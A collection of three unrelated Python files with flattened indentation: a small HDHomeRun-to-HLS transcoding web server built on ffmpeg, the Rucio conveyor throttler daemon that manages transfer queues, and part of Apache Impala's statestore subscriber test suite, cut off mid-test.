import SocketServer
from threading import Thread
import time
import signal
import sys
import shutil
os.chdir("tcode")
timer=0
done=False
p=False
def scanTuners():
p=subprocess.Popen(["hdhomerun_config","discover"],stdout=subprocess.PIPE)
x=p.communicate()[0]
return x.split("at")[1].rstrip().replace(" ","")
def ffmpeg_codecs():
x=subprocess.Popen(["ffmpeg","-codecs"],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
y=x.communicate()[0]
return y.find("libfdk_aac")
channelComp=""
host=""
def start_ffmpeg():
global channelComp
global p
global host
acodecs=['libfdk_aac', '-ac:a:0', '2', '-vbr', '5']
if ffmpeg_codecs() == -1:
print "Hey. You. Get FFmpeg with libfdk_aac! Your ears will thank you!"
acodecs=["aac","-ac","2","-b:a:0","128k","-strict","-2"]
logfile = open('../ffmpeg_log.txt', 'w')
p=subprocess.Popen(["ffmpeg","-i","http://"+host+":5004/auto/v"+channelComp,"-vcodec","libx264","-preset","veryfast","-acodec"]+acodecs+["-vf","yadif=0:0:0","out.m3u8"],stdout=logfile,stderr=logfile)
def letsgo(chan):
global done
global timer
global p
global channelComp
ch=chan.split("_")
# http://192.168.0.149:5004/auto/v41.1
channelComp=ch[0]+"."+ch[1]
thread2 = Thread(target = start_ffmpeg)
thread2.start()
while done==False: # get 10MB of the file...
elapsed_time = time.time() - timer
print "here "+str(elapsed_time)+" "+str(timer)
if int(elapsed_time) > 20 and timer != 0:
done=True
happening=False
p.kill()
time.sleep(5)
print "over"
import glob
files = glob.glob('./*.ts')
for f in files:
os.remove(f)
os.remove("./out.m3u8")
happening=False
class CustomHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
global done
global happening
global timer
elapsed_time = time.time() - timer
print elapsed_time
if timer==0 or elapsed_time < 20:
timer=time.time()
else:
print "Stream finished! Cleaning up!"
done=True
happening=False
if self.path.find("?chan="):
if happening==False:
ch=self.path.split("?chan=")
if len(ch)<2:
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
return
print ch
ch=ch[1]
ch=ch.replace("/","")
print ch
try:
os.remove("./out.m3u8")
except:
pass
th = Thread(target = letsgo, args=(ch,))
th.start()
timer=0
done=False
happening=True
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
host=scanTuners()
o=open("ip.txt","w")
o.write(host)
o.close()
#Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
SocketServer.TCPServer.allow_reuse_address=True
httpd = SocketServer.TCPServer(("", 7090), CustomHandler)
httpd.serve_forever()
|
throttler.py
|
# -*- coding: utf-8 -*-
# Copyright CERN since 2016
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Conveyor throttler is a daemon to manage rucio internal queue.
"""
from __future__ import division
import logging
import math
import threading
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.logging import setup_logging
from rucio.common.utils import get_parsed_throttler_mode
from rucio.core import config as config_core
from rucio.core.monitor import record_counter, record_gauge
from rucio.core.request import get_stats_by_activity_direction_state, release_all_waiting_requests, release_waiting_requests_fifo, release_waiting_requests_grouped_fifo
from rucio.core.rse import get_rse, set_rse_transfer_limits, delete_rse_transfer_limits, get_rse_transfer_limits
from rucio.daemons.conveyor.common import run_conveyor_daemon
from rucio.db.sqla.constants import RequestState
graceful_stop = threading.Event()
def throttler(once=False, sleep_time=600, partition_wait_time=10):
"""
Main loop to check rse transfer limits.
"""
logging.info('Throttler starting')
logger_prefix = executable = 'conveyor-throttler'
run_conveyor_daemon(
once=once,
graceful_stop=graceful_stop,
executable=executable,
logger_prefix=logger_prefix,
partition_wait_time=partition_wait_time,
sleep_time=sleep_time,
run_once_fnc=run_once,
activities=None,
)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, sleep_time=600):
"""
Starts up the conveyer threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
if once:
logging.info('running throttler one iteration only')
throttler(once=True, sleep_time=sleep_time)
else:
threads = []
logging.info('starting throttler thread')
throttler_thread = threading.Thread(target=throttler, kwargs={'once': once, 'sleep_time': sleep_time})
threads.append(throttler_thread)
[thread.start() for thread in threads]
logging.info('waiting for interrupts')
# Interruptible joins require a timeout.
while threads:
threads = [thread.join(timeout=3.14) for thread in threads if thread and thread.is_alive()]
def __get_request_stats(all_activities=False, direction='destination'):
"""
Retrieve stats about requests and collect transfer limits.
:param all_activities: Boolean whether requests are grouped by activity or if activities are ignored.
:param direction: String whether request statistics are based on source or destination RSEs.
"""
logging.info("Throttler retrieve requests statistics")
results = get_stats_by_activity_direction_state(state=[RequestState.QUEUED,
RequestState.SUBMITTING,
RequestState.SUBMITTED,
RequestState.WAITING], all_activities=all_activities, direction=direction)
result_dict = {}
limits = get_rse_transfer_limits()
for result in results:
if direction == 'destination' or direction == 'source':
account = result[0]
state = result[1]
rse = result[2]
counter = result[3]
rse_id = result[4]
if all_activities:
threshold = limits.get('all_activities', {}).get(rse_id, {}).get('max_transfers')
if threshold or (counter and (state == RequestState.WAITING)):
if rse_id not in result_dict:
result_dict[rse_id] = {'waiting': 0,
'transfer': 0,
'threshold': threshold,
'rse': rse,
'strategy': limits.get('all_activities', {}).get(rse_id, {}).get('strategy'),
'deadline': limits.get('all_activities', {}).get(rse_id, {}).get('deadline'),
'volume': limits.get('all_activities', {}).get(rse_id, {}).get('volume'),
'activities': {}}
if state == RequestState.WAITING:
result_dict[rse_id]['waiting'] += counter
else:
result_dict[rse_id]['transfer'] += counter
else:
activity = result[5]
threshold = limits.get(activity, {}).get(rse_id, {}).get('max_transfers')
if threshold or (counter and (state == RequestState.WAITING)):
if rse_id not in result_dict:
result_dict[rse_id] = {
'rse': rse,
'activities': {}
}
if activity not in result_dict[rse_id]['activities']:
result_dict[rse_id]['activities'][activity] = {'waiting': 0,
'transfer': 0,
'strategy': limits.get(activity, {}).get(rse_id, {}).get('strategy'),
'deadline': limits.get('all_activities', {}).get(rse_id, {}).get('deadline'),
'volume': limits.get('all_activities', {}).get(rse_id, {}).get('volume'),
'threshold': threshold,
'accounts': {}}
if account not in result_dict[rse_id]['activities'][activity]['accounts']:
result_dict[rse_id]['activities'][activity]['accounts'][account] = {'waiting': 0, 'transfer': 0}
if state == RequestState.WAITING:
result_dict[rse_id]['activities'][activity]['accounts'][account]['waiting'] += counter
result_dict[rse_id]['activities'][activity]['waiting'] += counter
else:
result_dict[rse_id]['activities'][activity]['accounts'][account]['transfer'] += counter
result_dict[rse_id]['activities'][activity]['transfer'] += counter
return result_dict
def run_once(worker_number=0, logger=logging.log, session=None, **kwargs):
"""
Schedule requests
"""
if worker_number != 0:
logger(logging.INFO, 'Throttler thread id is not 0, will sleep. Only thread 0 will work')
return True
logger(logging.INFO, "Throttler - schedule requests")
try:
throttler_mode = config_core.get('throttler', 'mode', default='DEST_PER_ACT', use_cache=False)
direction, all_activities = get_parsed_throttler_mode(throttler_mode)
result_dict = __get_request_stats(all_activities, direction)
if direction == 'destination' or direction == 'source':
for rse_id in result_dict:
rse_name = result_dict[rse_id]['rse']
availability = get_rse(rse_id).availability
# dest_rse is not blocklisted for write or src_rse is not blocklisted for read
if (direction == 'destination' and availability & 2) or (direction == 'source' and availability & 4):
if all_activities:
__release_all_activities(result_dict[rse_id], direction, rse_name, rse_id, logger=logger, session=session)
else:
__release_per_activity(result_dict[rse_id], direction, rse_name, rse_id, logger=logger, session=session)
except Exception:
logger(logging.CRITICAL, "Failed to schedule requests, error: %s" % (traceback.format_exc()))
return True
def __release_all_activities(stats, direction, rse_name, rse_id, logger, session):
"""
Release requests if activities should be ignored.
:param stats: Request statistics
:param direction: String whether request statistics are based on source or destination RSEs.
:param rse_name: RSE name.
:param rse_id: RSE id.
"""
threshold = stats['threshold']
transfer = stats['transfer']
waiting = stats['waiting']
strategy = stats['strategy']
if threshold is not None and transfer + waiting > threshold:
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', threshold, labels={'activity': 'all_activities', 'rse': rse_name, 'limit_attr': 'max_transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', transfer, labels={'activity': 'all_activities', 'rse': rse_name, 'limit_attr': 'transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', waiting, labels={'activity': 'all_activities', 'rse': rse_name, 'limit_attr': 'waiting'})
if transfer < 0.8 * threshold:
to_be_released = threshold - transfer
if strategy == 'grouped_fifo':
deadline = stats.get('deadline')
volume = stats.get('volume')
release_waiting_requests_grouped_fifo(rse_id, count=to_be_released, direction=direction, volume=volume, deadline=deadline, session=session)
elif strategy == 'fifo':
release_waiting_requests_fifo(rse_id, count=to_be_released, direction=direction, session=session)
else:
logger(logging.DEBUG, "Throttler has done nothing on rse %s (transfer > 0.8 * threshold)" % rse_name)
elif waiting > 0 or not threshold:
logger(logging.DEBUG, "Throttler remove limits(threshold: %s) and release all waiting requests, rse %s" % (threshold, rse_name))
delete_rse_transfer_limits(rse_id, activity='all_activities', session=session)
release_all_waiting_requests(rse_id, direction=direction, session=session)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.{activity}.{rse}', labels={'activity': 'all_activities', 'rse': rse_name})
def __release_per_activity(stats, direction, rse_name, rse_id, logger, session):
"""
Release requests per activity.
:param stats: Request statistics
:param direction: String whether request statistics are based on source or destination RSEs.
:param rse_name: RSE name.
:param rse_id: RSE id.
"""
for activity in stats['activities']:
threshold = stats['activities'][activity]['threshold']
transfer = stats['activities'][activity]['transfer']
waiting = stats['activities'][activity]['waiting']
if waiting:
logger(logging.DEBUG, "Request status for %s at %s: %s" % (activity, rse_name,
stats['activities'][activity]))
if threshold is None:
logger(logging.DEBUG, "Throttler remove limits(threshold: %s) and release all waiting requests for activity %s, rse_id %s" % (threshold, activity, rse_id))
delete_rse_transfer_limits(rse_id, activity=activity, session=session)
release_all_waiting_requests(rse_id, activity=activity, direction=direction, session=session)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.{activity}.{rse}', labels={'activity': activity, 'rse': rse_name})
elif transfer + waiting > threshold:
logger(logging.DEBUG, "Throttler set limits for activity %s, rse %s" % (activity, rse_name))
set_rse_transfer_limits(rse_id, activity=activity, max_transfers=threshold, transfers=transfer, waitings=waiting, session=session)
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', threshold, labels={'activity': activity, 'rse': rse_name, 'limit_attr': 'max_transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', transfer, labels={'activity': activity, 'rse': rse_name, 'limit_attr': 'transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', waiting, labels={'activity': activity, 'rse': rse_name, 'limit_attr': 'waiting'})
if transfer < 0.8 * threshold:
# release requests on account
nr_accounts = len(stats['activities'][activity]['accounts'])
if nr_accounts < 1:
nr_accounts = 1
to_release = threshold - transfer
threshold_per_account = math.ceil(threshold / nr_accounts)
to_release_per_account = math.ceil(to_release / nr_accounts)
accounts = stats['activities'][activity]['accounts']
for account in accounts:
if nr_accounts == 1:
logger(logging.DEBUG, "Throttler release %s waiting requests for activity %s, rse %s, account %s " % (to_release, activity, rse_name, account))
release_waiting_requests_fifo(rse_id, activity=activity, account=account, count=to_release, direction=direction, session=session)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.{activity}.{rse}.{account}', to_release, labels={'activity': activity, 'rse': rse_name, 'account': account})
elif accounts[account]['transfer'] > threshold_per_account:
logger(logging.DEBUG, "Throttler will not release %s waiting requests for activity %s, rse %s, account %s: It queued more transfers than its share " %
(accounts[account]['waiting'], activity, rse_name, account))
nr_accounts -= 1
to_release_per_account = math.ceil(to_release / nr_accounts)
elif accounts[account]['waiting'] < to_release_per_account:
logger(logging.DEBUG, "Throttler release %s waiting requests for activity %s, rse %s, account %s " % (accounts[account]['waiting'], activity, rse_name, account))
release_waiting_requests_fifo(rse_id, activity=activity, account=account, count=accounts[account]['waiting'], direction=direction, session=session)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.{activity}.{rse}.{account}', accounts[account]['waiting'], labels={'activity': activity, 'rse': rse_name, 'account': account})
to_release = to_release - accounts[account]['waiting']
nr_accounts -= 1
to_release_per_account = math.ceil(to_release / nr_accounts)
else:
logger(logging.DEBUG, "Throttler release %s waiting requests for activity %s, rse %s, account %s " % (to_release_per_account, activity, rse_name, account))
release_waiting_requests_fifo(rse_id, activity=activity, account=account, count=to_release_per_account, direction=direction, session=session)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.{activity}.{rse}.{account}', to_release_per_account, labels={'activity': activity, 'rse': rse_name, 'account': account})
to_release = to_release - to_release_per_account
nr_accounts -= 1
else:
logger(logging.DEBUG, "Throttler has done nothing for activity %s on rse %s (transfer > 0.8 * threshold)" % (activity, rse_name))
elif waiting > 0:
logger(logging.DEBUG, "Throttler remove limits(threshold: %s) and release all waiting requests for activity %s, rse %s" % (threshold, activity, rse_name))
delete_rse_transfer_limits(rse_id, activity=activity, session=session)
release_all_waiting_requests(rse_id, activity=activity, direction=direction, session=session)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.{activity}.{rse}', labels={'activity': activity, 'rse': rse_name})
|
test_statestore.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import defaultdict
import json
import logging
import socket
import threading
import traceback
import time
import urllib2
import uuid
from Types.ttypes import TNetworkAddress
from thrift.protocol import TBinaryProtocol
from thrift.server.TServer import TServer
from thrift.transport import TSocket
from thrift.transport import TTransport
import StatestoreService.StatestoreSubscriber as Subscriber
import StatestoreService.StatestoreService as Statestore
from StatestoreService.StatestoreSubscriber import TUpdateStateResponse
from StatestoreService.StatestoreSubscriber import TTopicRegistration
from ErrorCodes.ttypes import TErrorCode
from Status.ttypes import TStatus
from tests.common.environ import specific_build_type_timeout
LOG = logging.getLogger('test_statestore')
# Tests for the statestore. The StatestoreSubscriber class is a skeleton implementation of
# a Python-based statestore subscriber with additional hooks to allow testing. Each
# StatestoreSubscriber runs its own server so that the statestore may contact it.
#
# All tests in this file may be run in parallel. They assume that a statestore instance is
# already running, and is configured with out-of-the-box defaults (as is the case in our
# usual test environment) which govern failure-detector timeouts etc.
#
# These tests do not yet provide sufficient coverage.
# If no topic entries, do the first and second subscribers always get a callback?
# Adding topic entries to non-existant topic
# Test for from_version and to_version behavior
# Test with many concurrent subscribers
# Test that only the subscribed-to topics are sent
# Test that topic deletions take effect correctly.
def get_statestore_subscribers(host='localhost', port=25010):
response = urllib2.urlopen("http://{0}:{1}/subscribers?json".format(host, port))
page = response.read()
return json.loads(page)
STATUS_OK = TStatus(TErrorCode.OK)
DEFAULT_UPDATE_STATE_RESPONSE = TUpdateStateResponse(status=STATUS_OK, topic_updates=[],
skipped=False)
# IMPALA-3501: the timeout needs to be higher in code coverage builds
WAIT_FOR_FAILURE_TIMEOUT = specific_build_type_timeout(40, code_coverage_build_timeout=60)
class WildcardServerSocket(TSocket.TSocketBase, TTransport.TServerTransportBase):
"""Specialised server socket that binds to a random port at construction"""
def __init__(self, host=None, port=0):
self.host = host
self.handle = None
self.handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.handle.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.handle.bind(('localhost', 0))
_, self.port = self.handle.getsockname()
def listen(self):
self.handle.listen(128)
def accept(self):
client, addr = self.handle.accept()
result = TSocket.TSocket()
result.setHandle(client)
return result
class KillableThreadedServer(TServer):
"""Based on TServer.TThreadedServer, this server may be shutdown (by calling
shutdown()), after which no new connections may be made. Most of the implementation is
directly copied from Thrift."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
self.is_shutdown = False
self.port = self.serverTransport.port
def shutdown(self):
self.is_shutdown = True
self.serverTransport.close()
self.wait_until_down()
def wait_until_up(self, num_tries=10):
for i in xrange(num_tries):
cnxn = TSocket.TSocket('localhost', self.port)
try:
cnxn.open()
return
except Exception, e:
if i == num_tries - 1: raise
time.sleep(0.1)
def wait_until_down(self, num_tries=10):
for i in xrange(num_tries):
cnxn = TSocket.TSocket('localhost', self.port)
try:
cnxn.open()
time.sleep(0.1)
except Exception, e:
return
raise Exception("Server did not stop")
def serve(self):
self.serverTransport.listen()
while not self.is_shutdown:
client = self.serverTransport.accept()
# Since accept() can take a while, check again if the server is shutdown to avoid
# starting an unnecessary thread.
if self.is_shutdown: return
t = threading.Thread(target=self.handle, args=(client,))
t.setDaemon(self.daemon)
t.start()
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while not self.is_shutdown:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print x
itrans.close()
otrans.close()
class StatestoreSubscriber(object):
"""A bare-bones subscriber skeleton. Tests should create a new StatestoreSubscriber(),
call start() and then register(). The subscriber will run a Thrift server on an unused
port, and after registration the statestore will call Heartbeat() and UpdateState() via
RPC. Tests can provide callbacks to the constructor that will be called during those
RPCs, and this is the easiest way to check that the statestore protocol is being
correctly followed. Tests should use wait_for_* methods to confirm that some event (like
an RPC call) has happened asynchronously.
Since RPC callbacks will execute on a different thread from the main one, any assertions
there will not trigger a test failure without extra plumbing. What we do is simple: any
exceptions during an RPC are caught and stored, and the check_thread_exceptions() method
will re-raise them.
The methods that may be called by a test deliberately return 'self' to allow for
chaining, see test_failure_detected() for an example of how this makes the test flow
more readable."""
def __init__(self, heartbeat_cb=None, update_cb=None):
self.heartbeat_event, self.heartbeat_count = threading.Condition(), 0
# Track the number of updates received per topic.
self.update_counts = defaultdict(lambda : 0)
# Variables to notify for updates on each topic.
self.update_event = threading.Condition()
self.heartbeat_cb, self.update_cb = heartbeat_cb, update_cb
self.subscriber_id = "python-test-client-%s" % uuid.uuid1()
self.exception = None
def Heartbeat(self, args):
"""Heartbeat RPC handler. Calls heartbeat callback if one exists."""
self.heartbeat_event.acquire()
try:
self.heartbeat_count += 1
response = Subscriber.THeartbeatResponse()
if self.heartbeat_cb is not None and self.exception is None:
try:
response = self.heartbeat_cb(self, args)
except Exception, e:
self.exception = e
self.heartbeat_event.notify()
finally:
self.heartbeat_event.release()
return response
def UpdateState(self, args):
"""UpdateState RPC handler. Calls update callback if one exists."""
self.update_event.acquire()
try:
for topic_name in args.topic_deltas: self.update_counts[topic_name] += 1
response = DEFAULT_UPDATE_STATE_RESPONSE
if self.update_cb is not None and self.exception is None:
try:
response = self.update_cb(self, args)
except Exception, e:
# Print the original backtrace so it doesn't get lost.
traceback.print_exc()
self.exception = e
self.update_event.notify()
finally:
self.update_event.release()
return response
def __init_server(self):
processor = Subscriber.Processor(self)
transport = WildcardServerSocket()
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
self.server = KillableThreadedServer(processor, transport, tfactory, pfactory,
daemon=True)
self.server_thread = threading.Thread(target=self.server.serve)
self.server_thread.setDaemon(True)
self.server_thread.start()
self.server.wait_until_up()
self.port = self.server.port
def __init_client(self):
self.client_transport = \
TTransport.TBufferedTransport(TSocket.TSocket('localhost', 24000))
self.protocol = TBinaryProtocol.TBinaryProtocol(self.client_transport)
self.client = Statestore.Client(self.protocol)
self.client_transport.open()
def check_thread_exceptions(self):
"""Checks if an exception was raised and stored in a callback thread"""
if self.exception is not None: raise self.exception
def kill(self):
"""Closes both the server and client sockets, and waits for the server to become
unavailable"""
self.client_transport.close()
self.server.shutdown()
return self
def start(self):
"""Starts a subscriber server, and opens a client to the statestore. Returns only when
the server is running."""
self.__init_server()
self.__init_client()
return self
def register(self, topics=None):
"""Call the Register() RPC"""
if topics is None: topics = []
request = Subscriber.TRegisterSubscriberRequest(
topic_registrations=topics,
subscriber_location=TNetworkAddress("localhost", self.port),
subscriber_id=self.subscriber_id)
response = self.client.RegisterSubscriber(request)
if response.status.status_code == TErrorCode.OK:
self.registration_id = response.registration_id
else:
raise Exception("Registration failed: %s, %s" %
(response.status.status_code,
'\n'.join(response.status.error_msgs)))
return self
def wait_for_heartbeat(self, count=None):
"""Waits for some number of heartbeats. If 'count' is provided, waits until the number
of heartbeats seen by this subscriber exceeds count, otherwise waits for one further
heartbeat."""
self.heartbeat_event.acquire()
try:
if count is not None and self.heartbeat_count >= count: return self
if count is None: count = self.heartbeat_count + 1
while count > self.heartbeat_count:
self.check_thread_exceptions()
last_count = self.heartbeat_count
self.heartbeat_event.wait(10)
if last_count == self.heartbeat_count:
raise Exception("Heartbeat not received within 10s (heartbeat count: %s)" %
self.heartbeat_count)
self.check_thread_exceptions()
return self
finally:
self.heartbeat_event.release()
def wait_for_update(self, topic_name, count=None):
"""Waits for some number of updates of 'topic_name'. If 'count' is provided, waits
until the number updates seen by this subscriber exceeds count, otherwise waits
for one further update."""
self.update_event.acquire()
start_time = time.time()
try:
if count is not None and self.update_counts[topic_name] >= count: return self
if count is None: count = self.update_counts[topic_name] + 1
while count > self.update_counts[topic_name]:
self.check_thread_exceptions()
last_count = self.update_counts[topic_name]
self.update_event.wait(10)
if (time.time() > start_time + 10 and
last_count == self.update_counts[topic_name]):
raise Exception("Update not received for %s within 10s (update count: %s)" %
(topic_name, last_count))
self.check_thread_exceptions()
return self
finally:
self.update_event.release()
def wait_for_failure(self, timeout=WAIT_FOR_FAILURE_TIMEOUT):
"""Waits until this subscriber no longer appears in the statestore's subscriber
list. If 'timeout' seconds pass, throws an exception."""
start = time.time()
while time.time() - start < timeout:
subs = [s["id"] for s in get_statestore_subscribers()["subscribers"]]
if self.subscriber_id not in subs: return self
time.sleep(0.2)
raise Exception("Subscriber %s did not fail in %ss" % (self.subscriber_id, timeout))
class TestStatestore():
def make_topic_update(self, topic_name, key_template="foo", value_template="bar",
num_updates=1, clear_topic_entries=False):
topic_entries = [
Subscriber.TTopicItem(key=key_template + str(x), value=value_template + str(x))
for x in xrange(num_updates)]
return Subscriber.TTopicDelta(topic_name=topic_name,
topic_entries=topic_entries,
is_delta=False,
clear_topic_entries=clear_topic_entries)
def test_registration_ids_different(self):
"""Test that if a subscriber with the same id registers twice, the registration ID is
different"""
sub = StatestoreSubscriber()
sub.start().register()
old_reg_id = sub.registration_id
sub.register()
assert old_reg_id != sub.registration_id
def test_receive_heartbeats(self):
"""Smoke test to confirm that heartbeats get sent to a correctly registered
subscriber"""
sub = StatestoreSubscriber()
sub.start().register().wait_for_heartbeat(5)
def test_receive_updates(self):
"""Test that updates are correctly received when a subscriber alters a topic"""
topic_name = "topic_delta_%s" % uuid.uuid1()
def topic_update_correct(sub, args):
delta = self.make_topic_update(topic_name)
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif update_count == 2:
assert len(args.topic_deltas) == 1, args.topic_deltas
assert args.topic_deltas[topic_name].topic_entries == delta.topic_entries
assert args.topic_deltas[topic_name].topic_name == delta.topic_name
elif update_count == 3:
# After the content-bearing update was processed, the next delta should be empty
assert len(args.topic_deltas[topic_name].topic_entries) == 0
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=topic_update_correct)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_filter_prefix(self):
topic_name = "topic_delta_%s" % uuid.uuid1()
def topic_update_correct(sub, args):
foo_delta = self.make_topic_update(topic_name, num_updates=1)
bar_delta = self.make_topic_update(topic_name, num_updates=2, key_template='bar')
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
# Send some values with both prefixes.
return TUpdateStateResponse(status=STATUS_OK,
topic_updates=[foo_delta, bar_delta],
skipped=False)
elif update_count == 2:
# We should only get the 'bar' entries back.
assert len(args.topic_deltas) == 1, args.topic_deltas
assert args.topic_deltas[topic_name].topic_entries == bar_delta.topic_entries
assert args.topic_deltas[topic_name].topic_name == bar_delta.topic_name
elif update_count == 3:
# Send some more updates that only have 'foo' prefixes.
return TUpdateStateResponse(status=STATUS_OK,
topic_updates=[foo_delta],
skipped=False)
elif update_count == 4:
# We shouldn't see any entries from the above update, but we should still see
# the version number change due to the new entries in the topic.
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].from_version == 3
assert args.topic_deltas[topic_name].to_version == 4
elif update_count == 5:
# After the content-bearing update was processed, the next delta should be empty
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].from_version == 4
assert args.topic_deltas[topic_name].to_version == 4
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=topic_update_correct)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False,
filter_prefix="bar")
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 5)
)
def test_update_is_delta(self):
"""Test that the 'is_delta' flag is correctly set. The first update for a topic should
always not be a delta, and so should all subsequent updates until the subscriber says
it has not skipped the update."""
topic_name = "test_update_is_delta_%s" % uuid.uuid1()
def check_delta(sub, args):
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
assert args.topic_deltas[topic_name].is_delta == False
delta = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif update_count == 2:
assert args.topic_deltas[topic_name].is_delta == False
elif update_count == 3:
assert args.topic_deltas[topic_name].is_delta == True
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].to_version == 1
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=check_delta)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_skipped(self):
"""Test that skipping an update causes it to be resent"""
topic_name = "test_skipped_%s" % uuid.uuid1()
def check_skipped(sub, args):
# Ignore responses that don't contain our topic.
if topic_name not in args.topic_deltas: return DEFAULT_UPDATE_STATE_RESPONSE
update_count = sub.update_counts[topic_name]
if update_count == 1:
update = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[update],
skipped=False)
# All subsequent updates: set skipped=True and expected the full topic to be resent
# every time
assert args.topic_deltas[topic_name].is_delta == False
assert len(args.topic_deltas[topic_name].topic_entries) == 1
return TUpdateStateResponse(status=STATUS_OK, skipped=True)
sub = StatestoreSubscriber(update_cb=check_skipped)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_failure_detected(self):
sub = StatestoreSubscriber()
topic_name = "test_failure_detected"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 1)
.kill()
.wait_for_failure()
)
def test_hung_heartbeat(self):
"""Test for IMPALA-1712: If heartbeats hang (which we simulate by sleeping for five
minutes) the statestore should time them out every 3s and then eventually fail after
40s (10 times (3 + 1), where the 1 is the inter-heartbeat delay)"""
sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(300))
topic_name = "test_hung_heartbeat"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 1)
.wait_for_failure(timeout=60)
)
def test_topic_persistence(self):
"""Test that persistent topic entries survive subscriber failure, but transent topic
entries are erased when the associated subscriber fails"""
topic_id = str(uuid.uuid1())
persistent_topic_name = "test_topic_persistence_persistent_%s" % topic_id
transient_topic_name = "test_topic_persistence_transient_%s" % topic_id
def add_entries(sub, args):
# None of, one or both of the topics may be in the update.
updates = []
if (persistent_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
updates.append(self.make_topic_update(persistent_topic_name))
if (transient_topic_name in args.topic_deltas and
sub.update_counts[transient_topic_name] == 1):
updates.append(self.make_topic_update(transient_topic_name))
if len(updates) > 0:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
skipped=False)
return DEFAULT_UPDATE_STATE_RESPONSE
def check_entries(sub, args):
# None of, one or both of the topics may be in the update.
if (persistent_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
assert len(args.topic_deltas[persistent_topic_name].topic_entries) == 1
# Statestore should not send deletions when the update is not a delta, see
